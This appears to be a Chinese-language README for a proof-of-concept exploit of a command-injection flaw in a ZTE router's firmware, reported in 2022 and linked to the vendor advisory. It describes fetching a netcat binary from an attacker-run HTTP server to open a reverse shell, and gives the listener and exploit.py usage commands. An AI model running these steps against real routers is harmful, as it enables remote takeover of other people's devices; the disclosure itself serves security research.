固件详细信息:
wa_inner_version: BD_POSTEMF286RMODULEV1.0.0B12
cr_version: CR_ITPOSTEMF286RV1.0.0B10
pip install requests)该漏洞是 zte_net_link_detect 二进制程序与 Web 服务器 goahead 二进制程序中的 WATCH_DOG_SWITCH 处理器之间共享的一个命令注入漏洞。
请注意,仅当路由器通过 WAN 连接到互联网或通过 SIM 卡连接到互联网时,该漏洞才能被利用。("ppp_status" 键的值必须是 "ppp_connected"、"ipv4_ipv6_connected" 或 "ipv6_connected")。
该漏洞利用的思路是从 http 服务器下载 netcat 静态二进制文件,然后使用它打开一个反向 shell。 附注:此文件夹中包含的 netcat 是大端序的。
python3 -m http.server 8080nc -lvp 9999 在端口 9999 上打开一个监听套接字python3 exploit.py http://<router> <admin_password> <attacker_ip, es: 192.168.1.101>此漏洞由 Andrea Maugeri 于 2022 年 9 月报告。 https://support.zte.com.cn/support/news/NewsDetail.aspx?newsId=1028664